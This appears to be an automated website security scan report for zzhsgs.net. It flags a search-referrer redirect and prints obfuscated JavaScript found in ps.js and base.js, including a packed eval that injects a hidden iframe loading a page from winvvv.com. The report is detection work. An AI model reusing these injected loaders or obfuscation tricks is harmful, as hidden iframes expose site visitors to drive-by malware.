Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://www.zzhsgs.net/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: www.zzhsgs.net Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Sat, 21 Jun 2014 04:26:42 GMT Location: http://www.522888.com/ Server: Microsoft-IIS/6.0 Content-Type: text/html X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.17 | malicious |
Scanned pages/files
Request | Server response | Status |
http://www.zzhsgs.net/ | 200 OK Content-Length: 54876 Content-Type: text/html | clean |
http://www.zzhsgs.net/ps/ps.js | 200 OK Content-Length: 10485 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) OlOlll="(x)";OllOlO=" String";OlllOO="tion";OlOllO="Code(x)}";OllOOO="Char";OlllOl="func";OllllO=" l = ";OllOOl=".from";OllOll="{return";Olllll="var";eval(Olllll+OllllO+OlllOl+OlllOO+OlOlll+OllOll+OllOlO+OllOOl+OllOOO+OlOllO);eval(l(79)+l(61)+l(102)+l(117)+l(110)+l(99)+l(116)+l(105)+l(111)+l(110)+l(40)+l(109)+l(41)+l(123)+l(114)+l(101)+l(116)+l(117)+l(114)+l(110)+l(32)+l(83)+l(116)+l(114)+l(105)+l(110)+l(103)+l(46)+l(102)+l(114)+l(111)+l(109)+l(67)+l(104)+l(97)+l(114)+l(67)+l(111)+l(100)+l(101)+ Antivirus reports:
| ||
http://www.zzhsgs.net/base/js/base.js | 200 OK Content-Length: 31631 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('5.6("<1 7=\\"2://3.4/b.c\\" a=\\"0\\" 8=\\"0\\" 9=\\"0\\"></1>");',13,13,'|iframe|http|winvvv|com|document|writeln|src|height|frameborder|width|cs|html'.s function getCookie(sName) { var aCookie = document.cookie.split("; "); for (var i=0; i < aCookie.length; i++){ var aCrumb = aCookie[i].split("="); if (sName == aCrumb[0]){ return unescape(aCrumb[1]); } } return null; } --> Antivirus reports:
| ||
http://www.zzhsgs.net/base/js/common.js | 200 OK Content-Length: 10754 Content-Type: application/x-javascript | clean |
http://www.zzhsgs.net/base/js/form.js | 200 OK Content-Length: 16332 Content-Type: application/x-javascript | clean |
http://www.zzhsgs.net/base/js/blockui.js | 200 OK Content-Length: 12587 Content-Type: application/x-javascript | clean |
http://www.zzhsgs.net/search/js/searchform.js | 200 OK Content-Length: 665 Content-Type: application/x-javascript | clean |
http://www.zzhsgs.net/-1 | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
http://www.zzhsgs.net/test404page.js | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
http://www.zzhsgs.net/index.php | 200 OK Content-Length: 54876 Content-Type: text/html | clean |
http://www.zzhsgs.net/page/html/company.php | 200 OK Content-Length: 20988 Content-Type: text/html | clean |
http://www.zzhsgs.net/page/html/../../base/js/base.js | 200 OK Content-Length: 31631 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('5.6("<1 7=\\"2://3.4/b.c\\" a=\\"0\\" 8=\\"0\\" 9=\\"0\\"></1>");',13,13,'|iframe|http|winvvv|com|document|writeln|src|height|frameborder|width|cs|html'.s function getCookie(sName) { var aCookie = document.cookie.split("; "); for (var i=0; i < aCookie.length; i++){ var aCrumb = aCookie[i].split("="); if (sName == aCrumb[0]){ return unescape(aCrumb[1]); } } return null; } --> Antivirus reports:
| ||
http://www.zzhsgs.net/page/html/../../base/js/common.js | 200 OK Content-Length: 10754 Content-Type: application/x-javascript | clean |
http://www.zzhsgs.net/page/html/../../base/js/form.js | 200 OK Content-Length: 16332 Content-Type: application/x-javascript | clean |
http://www.zzhsgs.net/page/html/../../base/js/blockui.js | 200 OK Content-Length: 12587 Content-Type: application/x-javascript | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=zzhsgs.net
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://zzhsgs.net/
Result: zzhsgs.net is not infected or malware details are not published yet.
Result: zzhsgs.net is not infected or malware details are not published yet.